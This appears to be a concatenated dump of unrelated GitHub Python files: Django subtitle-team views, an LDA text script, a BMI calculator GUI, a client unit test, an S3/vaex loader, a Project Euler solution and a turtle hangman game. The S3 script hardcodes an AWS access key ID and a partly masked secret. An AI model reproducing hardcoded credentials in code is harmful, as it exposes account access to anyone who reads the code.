request.user:\n 
was_mine = True\n else:\n was_mine = False\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n if task.assignee is None and was_mine:\n messages.success(request, _('Task declined.'))\n else:\n messages.success(request, _('Task assigned.'))\n else:\n messages.error(request, _('You cannot assign this task.'))\n\n return HttpResponseRedirect(next)\n\n@render_to_json\n@login_required\ndef assign_task_ajax(request, slug):\n '''Assign a task to the given user, or unassign it if null/None.'''\n team = get_object_or_404(Team, slug=slug)\n\n form = TaskAssignForm(team, request.user, data=request.POST)\n if form.is_valid():\n task = form.cleaned_data['task']\n assignee = form.cleaned_data['assignee']\n\n task.assignee = assignee\n task.set_expiration()\n task.save()\n notifier.team_task_assigned.delay(task.pk)\n\n return { 'success': True }\n else:\n return HttpResponseForbidden(_(u'Invalid assignment attempt.'))\n\ndef upload_draft(request, slug):\n\n if request.POST:\n form = UploadDraftForm(request.POST)\n\n if form.is_valid():\n\n team = get_object_or_404(Team, slug=slug)\n task = form.cleaned_data['task']\n draft = form.cleaned_data['draft']\n\n # Parse the file, etc.\n\n messages.success(request, _(u\"Draft uploaded successfully.\"))\n else:\n messages.error(request, _(u\"There was a problem uploading that draft.\"))\n\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n else:\n return HttpResponseBadRequest()\n\n# Projects\ndef project_list(request, slug):\n team = get_object_or_404(Team, slug=slug)\n projects = Project.objects.for_team(team)\n return render_to_response(\"teams/project_list.html\", {\n \"team\":team,\n \"projects\": projects\n }, RequestContext(request))\n\n@render_to('teams/settings-projects-add.html')\n@login_required\ndef add_project(request, slug):\n team = Team.get(slug, request.user)\n\n if request.POST:\n form = ProjectForm(request.POST)\n workflow_form = WorkflowForm(request.POST)\n\n if form.is_valid() and workflow_form.is_valid():\n\n if team.project_set.filter(slug=pan_slugify(form.cleaned_data['name'])).exists():\n messages.error(request, _(u\"There's already a project with this name\"))\n else:\n project = form.save(commit=False)\n project.team = team\n project.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project added.'))\n return HttpResponseRedirect(\n reverse('teams:settings_projects', args=[], kwargs={'slug': slug}))\n else:\n form = ProjectForm()\n workflow_form = WorkflowForm()\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects-edit.html')\n@login_required\ndef edit_project(request, slug, project_slug):\n team = Team.get(slug, request.user)\n project = Project.objects.get(slug=project_slug, team=team)\n project_list_url = reverse('teams:settings_projects', args=[], kwargs={'slug': slug})\n\n if project.is_default_project:\n messages.error(request, _(u'You cannot edit that project.'))\n return HttpResponseRedirect(project_list_url)\n\n try:\n workflow = Workflow.objects.get(team=team, project=project)\n except Workflow.DoesNotExist:\n workflow = None\n\n if request.POST:\n if request.POST.get('delete', None) == 'Delete':\n project.delete()\n messages.success(request, _(u'Project deleted.'))\n return HttpResponseRedirect(project_list_url)\n else:\n 
form = ProjectForm(request.POST, instance=project)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n # if the project doesn't have workflow enabled, the workflow form\n # is going to fail to validate (workflow is None)\n # there's probably a better way of doing this...\n if form.is_valid() and workflow_form.is_valid if project.workflow_enabled else form.is_valid():\n form.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project saved.'))\n return HttpResponseRedirect(project_list_url)\n\n else:\n form = ProjectForm(instance=project)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'project': project, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/_third-party-accounts.html')\n@login_required\ndef third_party_accounts(request, slug):\n from accountlinker.views import _generate_youtube_oauth_request_link\n team = get_object_or_404(Team, slug=slug)\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n new_youtube_url = _generate_youtube_oauth_request_link(str(team.pk))\n linked_accounts = team.third_party_accounts.all()\n return {\n \"team\":team,\n \"new_youtube_url\": new_youtube_url,\n \"linked_accounts\": linked_accounts,\n }\n\n\n# Unpublishing\ndef _create_task_after_unpublishing(subtitle_version):\n team_video = subtitle_version.language.video.get_team_video()\n lang = subtitle_version.language.language\n\n # If there's already an open task for this language we don't need another.\n open_task_exists = team_video.task_set.incomplete().filter(language=lang).exists()\n\n if open_task_exists:\n return None\n\n workflow = Workflow.get_for_team_video(team_video)\n if workflow.approve_allowed:\n type = Task.TYPE_IDS['Approve']\n can_do = can_approve\n else:\n type = Task.TYPE_IDS['Review']\n can_do = can_review\n\n # Try to guess the appropriate assignee by looking at the last task.\n last_task = (team_video.task_set.complete().filter(language=lang, type=type)\n .order_by('-completed')\n [:1])\n assignee = None\n if last_task:\n candidate = last_task[0].assignee\n if candidate and can_do(team_video, candidate, lang):\n assignee = candidate\n\n task = Task(team=team_video.team, team_video=team_video,\n assignee=assignee, language=lang, type=type,\n subtitle_version=subtitle_version)\n task.set_expiration()\n task.save()\n\n return task\n\ndef _propagate_unpublish_to_external_services(language_pk, language_code, video):\n \"\"\"Push the 'unpublishing' of subs to third-party providers for the given language.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n except SubtitleLanguage.DoesNotExist:\n delete_captions_in_original_service_by_code.delay(language_code, video.pk)\n return\n\n # Find the latest public version to determine what kind of third-party call\n # we need to make.\n latest_version = language.latest_version(public_only=True)\n\n if latest_version:\n # There's a latest version that's still public, so third-party services\n # should use that one.\n upload_subtitles_to_original_service.delay(latest_version.pk)\n else:\n # There's no latest version that's still public, but we know the\n # language still exists.\n #\n # This means that all of 
the subs in the language have been unpublished\n # and are awaiting moderation.\n #\n # In this case we should delete the subs from the external service\n # entirely, since we know that all the subs we have are bad.\n delete_captions_in_original_service.delay(language_pk)\n\ndef _propagate_unpublish_to_tasks(team_video, language_pk, language_code):\n \"\"\"Push the 'unpublishing' of a language to any tasks applying to it.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n if language and language.latest_version(public_only=False):\n # Don't kill any tasks if there are still versions remaining.\n return\n except SubtitleLanguage.DoesNotExist:\n pass\n\n tasks_to_delete = team_video.task_set.not_deleted()\n\n # If there is still no original language left, we can just delete all the\n # tasks for this video because someone deleted everything.\n #\n # If there *is* an original language left, we just delete tasks for the\n # languages that were unpublished.\n if team_video.video.subtitle_language():\n tasks_to_delete = tasks_to_delete.filter(language=language_code)\n\n tasks_to_delete.update(deleted=True)\n\ndef unpublish(request, slug):\n team = get_object_or_404(Team, slug=slug)\n\n form = UnpublishForm(request.user, team, request.POST)\n if not form.is_valid():\n messages.error(request, _(u'Invalid unpublishing request.\\nErrors:\\n') + '\\n'.join(flatten_errorlists(form.errors)))\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n version = form.cleaned_data['subtitle_version']\n team_video = version.language.video.get_team_video()\n video = version.language.video\n scope = form.cleaned_data['scope']\n should_delete = form.cleaned_data['should_delete']\n language = version.language\n\n results = []\n if scope == 'version':\n results.append([version.language.pk, version.language.language,\n version.unpublish(delete=should_delete)])\n elif scope == 'dependents':\n translations = list(SubtitleLanguage.objects.filter(video=language.video,\n standard_language=language,\n is_forked=False))\n for l in [language] + translations:\n results.append([l.pk, l.language,\n l.unpublish(delete=should_delete)])\n else:\n assert False, 'Invalid scope.'\n\n for language_pk, language_code, version_for_task in results:\n _propagate_unpublish_to_external_services(language_pk, language_code, video)\n _propagate_unpublish_to_tasks(team_video, language_pk, language_code)\n\n if version_for_task:\n _create_task_after_unpublishing(version_for_task)\n\n metadata_manager.update_metadata(team_video.video.pk)\n update_one_team_video(team_video.pk)\n\n messages.success(request, _(u'Successfully unpublished subtitles.'))\n api_subtitles_rejected.send(version)\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n@login_required\ndef auto_captions_status(request, slug):\n \"\"\"\n Prints a simple table of partner status for captions, this should\n should be used internally (as a cvs file with tab delimiters)\n \"\"\"\n buffer = []\n team = get_object_or_404(Team, slug=slug)\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n buffer.append( \"Video\\tproject\\tURL\\tstatus\\tjob_id\\ttask_id\\tcreated on\\tcompleted on\")\n for tv in team.teamvideo_set.all().select_related(\"job\", \"project\", \"video\"):\n jobs = tv.job_set.all()\n extra = \"\"\n if jobs.exists():\n j = jobs[0]\n extra = \"%s\\t%s\\t%s\\t%s\\t%s\" % 
(j.status, j.job_id, j.task_id, j.created_on, j.completed_on)\n url = \"%s://%s%s\" % (DEFAULT_PROTOCOL, Site.objects.get_current().domain, tv.video.get_absolute_url())\n buffer.append( \"Video:%s\\t %s\\t%s\\t %s\" % (tv.video.title,tv.project.name, url, extra))\n response = HttpResponse( \"\\n\".join(buffer), content_type=\"text/csv\")\n response['Content-Disposition'] = 'filename=team-status.csv'\n return response\n","repo_name":"nemgue/unisubs","sub_path":"apps/teams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":59698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"}
+{"seq_id":"73319974511","text":"from gensim.corpora import Dictionary, MmCorpus\nfrom konlpy.tag import Okt\nfrom gensim import word2vec\nfrom gensim.models import Phrases\nimport csv\n\ntwitter = Okt()\nresults = []\n\ndata_path = 'posts_data_50.csv'\nparsed_path = 'parsed_bamboo.txt'\nword2vec_path = 'Bambooword2vec.model'\n\n\n# parsing the data to parsed_bamboo.txt\ndef clean_posts(post):\n lines = post[0].split(\"\\n\")\n for line in lines:\n temp_list = twitter.pos(line, norm=True, stem=True)\n r = []\n for word in temp_list:\n if not word[1] in [\"Josa\", \"Eomi\", \"Punctuation\"]:\n r.append(word[0])\n rl = (\" \".join(r)).strip()\n return rl\n\n\nwith open(data_path, 'w') as f:\n data = csv.reader(f, delimiter=',')\n for row in data:\n results.append(clean_posts(row))\n\n\nwith open(parsed_path, 'w', encoding='utf-8') as fp:\n fp.write(\"\\n\".join(results))\n\n# making of the lda phrases analysis\n\n# making of the dictionary for lda topic analysis\ndict_made = False\n\ndict_path = 'dictionary.dict'\n\nif dict_made:\n dictionary = Dictionary.load(dict_path)\nelse:\n reviews_for_lda = word2vec.LineSentence(reviews_for_lda_filepath)\n dictionary = Dictionary(reviews_for_lda)\n dictionary.filter_extremes(no_below=10, no_above=0.4)\n dictionary.compactify()\n\n dictionary.save(dict_path)","repo_name":"haesookim/fbpage-scraping-exercise","sub_path":"lda_alt.py","file_name":"lda_alt.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34877042495","text":"# importing the tkinter module\nfrom tkinter import *\n\n# creating root window\nroot = Tk()\nroot.title(\"Ideal Body Mass Index\")\nroot.geometry(\"900x700\")\nroot.config(bg=\"cyan\")\nheader = Label(root, text='Ideal Body Mass Index Calculator', bg='gold', fg='blue', font=30)\nheader.place(x=250, y=20)\n\n# creating a frame in a root\nframe = Frame(root, width=500, height=200, relief='raised', bg='goldenrod')\nframe.place(x=200, y=50)\n\n# creating labels in a frame\nbmi_weight = Label(frame, text=\"Weight(kg):\", bg='white', fg='green')\nbmi_weight.place(x=50, y=20)\nbmi_weight_entry = Entry(frame)\nbmi_weight_entry.place(x=200, y=20)\n\nbmi_height = Label(frame, text=\"Height(cm):\", bg='white', fg='green')\nbmi_height.place(x=45, y=60)\nbmi_height_entry = Entry(frame)\nbmi_height_entry.place(relx=0.4, rely=0.3)\n\nuser_gender = Label(frame, text=\"Gender:\", bg='white', fg='green')\nuser_gender.place(rely=0.53, relx=0.1)\n\nage = Label(frame, text=\"Age:\", bg='white', fg='green')\nage.place(rely=0.8, relx=0.1)\nage_entry = Entry(frame, state='readonly')\nage_entry.place(rely=0.8, relx=0.4)\n\noptions = ['Female...', 'Male']\nvariable = StringVar(frame)\nvariable.set(options[0])\n\n# Below is the functions created\ndef activate(value):\n variable.set(value)\n if value != \"Select...\":\n age_entry.config(state='normal')\n else:\n age_entry.config(state='readonly')\n\n\ngender_menu = OptionMenu(frame, variable, *options, command=activate)\ngender_menu.place(relx=0.4, rely=0.5)\n\n\ndef bmi_calc():\n try:\n float(bmi_weight_entry.get())\n float(bmi_height_entry.get())\n float(age_entry.get())\n if variable.get() == \"Female..\":\n raise ValueError\n elif variable.get() == \"Male\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + 11.5\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n elif variable.get() == \"Female\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + (\n 0.03 * float(age_entry.get())) + 11\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n if result_bmi < 18.5:\n category.config(text='Underweight')\n elif 18.5 <= result_bmi < 25:\n category.config(text='Healthy')\n elif 25 <= result_bmi < 30:\n category.config(text='Overweight')\n elif result_bmi >= 30:\n category.config(text='Obese')\n\n except ValueError:\n messagebox.showerror(title=None, message='Gender was not specified or invalid entry was given')\n delete()\n\n\ncalculate = Button(root, text=\"Calculate your Ideal Body Mass Index\", width=50, command=bmi_calc)\ncalculate.place(rely=0.45, relx=0.2)\n\nbmi = Label(root, text=\"BMI:\", bg='white', fg=\"green\")\nbmi.place(rely=0.55, relx=0.1)\nbmi_field = Entry(root, state='readonly')\nbmi_field.place(rely=0.55, relx=0.2)\nideal_bmi = Label(root, text='Ideal BMI:', bg='white', fg=\"green\")\nideal_bmi.place(rely=0.55, relx=0.5)\nideal_field = Entry(root, 
state='readonly')\nideal_field.place(rely=0.55, relx=0.65)\n\n# The delete button function\ndef delete():\n    bmi_weight_entry.delete(0, END)\n    bmi_height_entry.delete(0, END)\n    age_entry.config(state='normal')\n    bmi_field.config(state='normal')\n    ideal_field.config(state='normal')\n    age_entry.delete(0, END)\n    bmi_field.delete(0, END)\n    ideal_field.delete(0, END)\n    age_entry.config(state='readonly')\n    bmi_field.config(state='readonly')\n    ideal_field.config(state='readonly')\n    bmi_weight_entry.focus()\n    variable.set(options[0])\n    category.config(text='')\n\n\ncategory_head = Label(root, text=\"Category:\", bg='orange', fg='white')\ncategory = Label(root, width=20, bg='blue', fg='white')\ncategory.place(relx=0.38, rely=0.72)\ncategory_head.place(relx=0.45, rely=0.67)\nclear = Button(root, text='Clear', command=delete)\nclear.place(rely=0.85, relx=0.1)\nquit = Button(root, text='Exit', command=root.destroy)\nquit.place(rely=0.85, relx=0.83)\n\n\nroot.mainloop()\n","repo_name":"mndabeni06/BMI_CALCULATOR","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
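The arithmetic in `bmi_calc` above is buried in widget plumbing. Here is a GUI-free sketch of the same BMI-and-category logic, using the same thresholds as the entry (the gender-specific "ideal BMI" formulas are left out):

```python
def bmi_category(weight_kg, height_cm):
    # BMI = weight (kg) / height (m) squared
    bmi = weight_kg / ((height_cm / 100) ** 2)
    if bmi < 18.5:
        label = 'Underweight'
    elif bmi < 25:
        label = 'Healthy'
    elif bmi < 30:
        label = 'Overweight'
    else:
        label = 'Obese'
    return round(bmi, 1), label

print(bmi_category(70, 175))  # (22.9, 'Healthy')
```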
+{"seq_id":"72611774831","text":"import testtools\nfrom unittest import mock\n\nfrom troveclient.v1 import root\n\n\"\"\"\nUnit tests for root.py\n\"\"\"\n\n\nclass RootTest(testtools.TestCase):\n def setUp(self):\n super(RootTest, self).setUp()\n self.orig__init = root.Root.__init__\n root.Root.__init__ = mock.Mock(return_value=None)\n self.root = root.Root()\n self.root.api = mock.Mock()\n self.root.api.client = mock.Mock()\n\n def tearDown(self):\n super(RootTest, self).tearDown()\n root.Root.__init__ = self.orig__init\n\n def _get_mock_method(self):\n self._resp = mock.Mock()\n self._body = None\n self._url = None\n\n def side_effect_func(url, body=None):\n self._body = body\n self._url = url\n return (self._resp, body)\n\n return mock.Mock(side_effect=side_effect_func)\n\n def test_delete(self):\n self.root.api.client.delete = self._get_mock_method()\n self._resp.status_code = 200\n self.root.delete(1234)\n self.assertEqual('/instances/1234/root', self._url)\n self._resp.status_code = 400\n self.assertRaises(Exception, self.root.delete, 1234)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"}
+{"seq_id":"17949364832","text":"#_main_\r\nli=[]\r\nwhile(True):\r\n item = eval(input(\"\\nEnter any correct format item to insert = \"))\r\n ind = int(input(\"Enter the index for insertion = \"))\r\n if(ind>len(li) or ind<0):\r\n print(\"Array index is out of range. Try Again !\")\r\n continue\r\n else:\r\n li.insert(ind, item)\r\n print(\"Now your array = \", li)\r\n \r\n choice = int(input(\"Want to continue? (1/0) = \"))\r\n if(choice==0):\r\n print(\"---> Come again later <---\")\r\n break\r\n continue","repo_name":"RitamPaul/Python_Scripting_College","sub_path":"insertItems_List.py","file_name":"insertItems_List.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"484128203","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO\nfrom scipy.stats import entropy\nfrom datetime import datetime\n\nS3_BUCKET = 'dmm-microbench'\n\ns3 = boto3.client('s3', aws_access_key_id=\"AKIASVDNFDSGZYUVLQED\", aws_secret_access_key=\"y8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXre\")\n\ndef download_s3_file(file_name, destination_file_name):\n s3.download_file(Bucket=S3_BUCKET, Key=file_name, Filename=destination_file_name)\n\ndef get_content(file_name, expression):\n return s3.select_object_content(\n Bucket=S3_BUCKET,\n Key=file_name,\n ExpressionType='SQL',\n Expression=expression,\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"Use\"}},\n OutputSerialization={'CSV': {}},\n )\n\n\ndef convert_data_to_df(data, record_header):\n for event in data['Payload']:\n if 'Records' in event:\n record_header.append(event['Records']['Payload'])\n csv_content = ''.join(r.decode('utf-8').replace(\"\\r\", \"\") for r in record_header)\n csv_pd = pd.read_csv(StringIO(csv_content))\n\n print('\\n##################################')\n print(f\"Length of dataframe: {len(csv_pd)}\")\n print(f\"Memory usage of dataframe: \\n {csv_pd.info(memory_usage='deep')}\")\n print('\\n##################################')\n\n return pd.DataFrame(csv_pd)\n\ndef convert_file_to_hdf5(file_name):\n import vaex\n vaex.from_csv(file_name, convert=True, chunk_size=500_000)\n\ni = 1\n\ndownload_s3_file(f\"yellow_tripdata_2019-0{i}.csv\", f\"yellow_tripdata_2019-0{i}.csv\")\n \nconvert_file_to_hdf5(f\"yellow_tripdata_2019-0{i}.csv\")","repo_name":"mohithg/largedata-histogram","sub_path":"test_vaex.py","file_name":"test_vaex.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21211815754","text":"import math\nimport sys\n\ndef C(n, k):\n return math.factorial(n) // math.factorial(k) // math.factorial(n-k)\n\ndef main():\n billionaire_ways = 0\n for h in range(432, 1001):\n billionaire_ways += C(1000, h)\n print(billionaire_ways / 2**1000)\n \nif __name__ == '__main__':\n sys.exit(main())\n\n# Final capital = (1 + 2x)^h (1 - x)^(1000 - h) where h is the count of heads.\n#\n# To be a billionaire, we need (1 + 2x)^h (1 - x)^(1000 - h) >= 10^9.\n# Or h >= (9 Log[10] - 1000 Log[1 - x])/(-Log[1 - x] + Log[1 + 2 x])\n#\n# By Wolfram Alpha website, we can solve the equation D[g(x), x] = 0\n# The proportion x ~~ 0.14688392244094067657558240, and thus \n# g(x) ~~ 431.25594829396045105038827, or h = 432.\n","repo_name":"syurskyi/Algorithms_and_Data_Structure","sub_path":"_algorithms_challenges/projecteuler/ProjectEuler-master(2)/ProjectEuler-master/267.py","file_name":"267.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"15647171467","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n turtle.setpos(20,230)\n turtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n turtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n coordenada_x1 = (window_comprimento/-2)+30\n turtle.setpos(coordenada_x1,-200)\n turtle.pendown()\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.right(90)\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.penup()\n coordenada_x2 = (window_comprimento/-2)+105\n turtle.setpos(coordenada_x2,-200)\n turtle.pendown()\n turtle.forward(250)\n turtle.right(90)#(-245,150)\n turtle.forward(100)\n turtle.right(90)#(-145,150)\n turtle.forward(25)\n turtle.penup()\n turtle.left(90)#(-145,125)\n turtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,25)\n turtle.left(180)\n turtle.pendown()\n turtle.fillcolor('yellow')\n turtle.begin_fill()\n turtle.circle(25)\n turtle.end_fill()\n turtle.fillcolor('black')\n turtle.penup()\n turtle.left(180)\n turtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(90)\n turtle.pendown()\n turtle.forward(80)\n turtle.penup()\n turtle.left(90)\n turtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(135)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(135)\n turtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(45)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(45)\n turtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(120)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(120)\n turtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(60)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(60)\n turtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n posicoes_letras = []\n coordenada_x = (window_comprimento/2)-30\n turtle.setpos(coordenada_x,-225)\n turtle.left(180)\n turtle.pensize(3)\n for i in letras_palavra:\n if i == ' ':\n turtle.forward(35)\n posicoes_letras.append([turtle.pos(),i])\n else:\n turtle.pendown()\n turtle.forward(30)\n turtle.penup()\n turtle.forward(5)\n posicoes_letras.append([turtle.pos(),i])\n turtle.pensize(5)\n turtle.left(180)\n turtle.home()\n posicoes_letras.reverse()\n return posicoes_letras\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, erros, acertos, erros_lista):\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n \n coordenada_x = (window_comprimento/-2)+erros*20\n index_acertos = []\n erro = ''\n \n \n if escolha in no_accent:\n for x,e in enumerate(no_accent):\n if escolha == e:\n index_acertos.append(x)\n if index_acertos in acertos:\n None\n for i in index_acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], 
font=('Arial',20,'bold'))\n turtle.home()\n return 0,index_acertos,None\n else:\n erro = escolha\n if erro in erros_lista:\n return 1,None,None\n else:\n turtle.setpos(coordenada_x+30,-255)\n turtle.write(escolha, font=('Arial',18,'bold'))\n turtle.home()\n return 1,None,erro\n\ndef caneta_setup ():\n caneta.hideturtle()\n caneta.speed(100)\n caneta.penup()\n caneta.color('Black')\n caneta.pensize(5)\n\ndef setup_window(comprimento):\n if comprimento <= 500:\n comprimento += 80\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 500 and comprimento <= 650:\n comprimento += 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 650 and comprimento <= 800:\n comprimento -= 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 800 and comprimento <= 1000:\n comprimento -= 110\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n else:\n comprimento -= 250\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n time.sleep(2)\n return True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros, erros_lista, window_comprimento):\n coordenada_x = (window_comprimento/-2)+30\n \n for i in acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n \n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n return True\n else:\n None\n \n turtle.setpos(coordenada_x,-255)\n for j in erros_lista:\n turtle.write(j, font=('Arial',18,'bold'))\n turtle.forward(20)\n\ndef sim():\n window.reset()\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n 
window.exitonclick()\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # limite_x: +-330, Limite_y: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\n\n\nlista_palavras = [] \nL = open('entrada.txt','r+',encoding='utf-8')\n\nfor i in L.readlines():\n s = i.lower().strip()\n if s == '':\n None\n else:\n lista_palavras.append(s)\nL.close()\n'''\n-------------------------------------------------------------------------------\n'''\n\nletras_palavra = []\n\nwhile lista_palavras != []:\n shuffle(lista_palavras)\n palavra = lista_palavras[int(len(lista_palavras)/2)]\n del lista_palavras[int(len(lista_palavras)/2)]\n \n for i in palavra:\n letras_palavra.append(i)\n letras_palavra.reverse()\n \n comprimento = (len(letras_palavra)*35)*2\n\n setup_window(comprimento)\n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n \n posicoes_letras = desenho_espacos(caneta, letras_palavra, window.window_width()) \n \n escolha = ''\n erros = 0\n erros_lista = []\n acertos = [] \n \n while True:\n escolha = window.textinput('','Escolha uma letra ou chute a palavra')\n \n if escolha == None:\n caneta.setpos(-175,100)\n caneta.write('Jogador desistiu. Volte sempre.', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n if escolha == no_accent or escolha == palavra:\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n elif escolha.isalpha() and len(escolha) == 1:\n a = []\n s = 0\n e = ''\n \n s,a,e = desenho_letras(caneta, palavra, posicoes_letras, escolha, window.window_width(), erros, acertos, erros_lista)\n if a == None:\n a = []\n else:\n for i in a:\n acertos.append(i)\n \n if e == None:\n e = ''\n else:\n erros_lista.append(e)\n erros += s\n \n \n p = body_maker(erros)\n if p == True:\n break\n 